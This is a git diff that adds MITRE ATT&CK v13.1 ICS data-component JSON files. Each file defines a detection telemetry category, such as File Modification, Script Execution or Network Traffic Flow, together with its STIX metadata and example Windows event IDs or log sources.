a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json new file mode 100644 index 0000000000000000000000000000000000000000..6e0fa14303ba0edbdb46ea09eff70750b46fa3a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--9475f9ad-d073-4400-baab-34750a91370a", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Modification", + "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json new file mode 100644 index 0000000000000000000000000000000000000000..4ac5d14c46e4d5287f1862de69dbda4514ee29f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--c7e7e616-1015-4c2e-89dd-26691ac3c34d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T21:47:33.604Z", + "name": "Software", + "description": "This includes sources of current and expected software or application programs deployed to a device, along with information on the version and patch level for vendor products, full source code for any application programs, and unique identifiers (e.g., hashes, signatures).", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "created": "2022-09-23T16:36:08.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json new file mode 100644 index 0000000000000000000000000000000000000000..d121897c8abd5d5f0897da59dc5fcc9b999af388 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--312837cb-6220-4c38-b85c-f9653737e95b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json new file mode 100644 index 0000000000000000000000000000000000000000..d82580c285de9b3e35cbdebd8b498f6b2ad2c20b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--b87fec8e-8659-4232-a024-ad6644d19029", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-21T15:41:36.287Z", + "name": "OS API Execution", + "description": "Operating system function/method calls executed by a process", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json new file mode 100644 index 0000000000000000000000000000000000000000..956c6ccc51e0100761041d50d0d38bfb8f0d7a9e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--461e74ee-e640-4d36-866d-6da18fcc9dac", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Application Log Content", + "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)", + "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json new file mode 100644 index 0000000000000000000000000000000000000000..a42284b8d1c306bbe37d4ea7bb27464aa8d79645 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--8dbc0c7e-036d-49b0-94f5-86bede3dfbf1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:18:20.802Z", + "name": "Logon Session Creation", + "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json new file mode 100644 index 0000000000000000000000000000000000000000..c82546cc3104e36ebdb3e28f5581ef3c955143e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--b53a0a0c-26fb-4713-98cd-f14e5f94d834", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json new file mode 100644 index 0000000000000000000000000000000000000000..4feee85354a5e7adf9e1f313420388953561c298 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--6c9766e6-1ad8-4cfb-a404-b25a6ec5318f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:16:55.269Z", + "name": "Script Execution", + "description": "The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json new file mode 100644 index 0000000000000000000000000000000000000000..d3f18105a9f5df3a99ec5f0475a003bd0cf26e2f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--fa235724-375c-4866-89c6-2b112520a2c1", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json new file mode 100644 index 0000000000000000000000000000000000000000..4d9cb84d6c150ebbfcc296105282a4fe0cf4945b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json 
@@ -0,0 +1,25 @@ +{ + "type": "bundle", + "id": "bundle--e8be8763-27b0-40cd-98d5-1f763d1b1794", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-07T16:19:46.282Z", + "name": "User Account Authentication", + "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json new file mode 100644 index 0000000000000000000000000000000000000000..aec5e21ecc0f0f2bc82764825ecb7f5891b4833d --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706.json 
@@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--b217c357-1ac8-4b29-b763-6849c45c14df", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T21:47:58.629Z", + "name": "Asset Inventory", + "description": "This includes sources of current and expected devices on the network, including the manufacturer, model, and necessary identifiers (e.g., IP and hardware addresses)", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "created": "2022-09-23T16:34:00.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json new file mode 100644 index 0000000000000000000000000000000000000000..82e6600b3a19ef649f929d26c461c30544ba6b0b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e69f9550-ccad-46c6-857f-b94113d6505d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Firmware Modification", + "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)", + "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json new file mode 100644 index 0000000000000000000000000000000000000000..10bedc9ea92b4d9a4fd6f849d04913c597dd1086 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d6cb08d1-80a5-4d57-a890-7dc63bc964a3", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Module Load", + "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)", + "x_mitre_data_source_ref": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json new file mode 100644 index 0000000000000000000000000000000000000000..f2b40fda06f22e03a712c4a55cef7ab2575f47f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--4d557e09-1748-4ee2-bfdc-69fdd62de8eb", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Modification", + "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json new file mode 100644 index 0000000000000000000000000000000000000000..9822195b0591369d0ea34513d2bb34b8fa102eea --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e6916262-5bf8-4553-9875-5efefa565d4c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.805Z", + "name": "File Deletion", + "description": "Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json new file mode 100644 index 0000000000000000000000000000000000000000..232ebed7f66595f2392174503502de5634b3f815 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--8ba7cfa7-6826-4b63-82d4-a5a082608cd2", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json new file mode 100644 index 0000000000000000000000000000000000000000..2ba2ab15b1374357abb7d79138a614156283f15b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--ec8b6382-252c-4f75-9dbc-0969c4b851cd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Creation", + "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json new file mode 100644 index 0000000000000000000000000000000000000000..95d7475244f7b07e92c2bb5011e0581dfdd5e448 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--cdcef489-bdad-49d7-98bb-dcfb8019b344", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Network Share Access", + "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)", + "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json new file mode 100644 index 0000000000000000000000000000000000000000..718883838566f5c44aeae5edd263716e29a10ba3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-component/x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b.json 
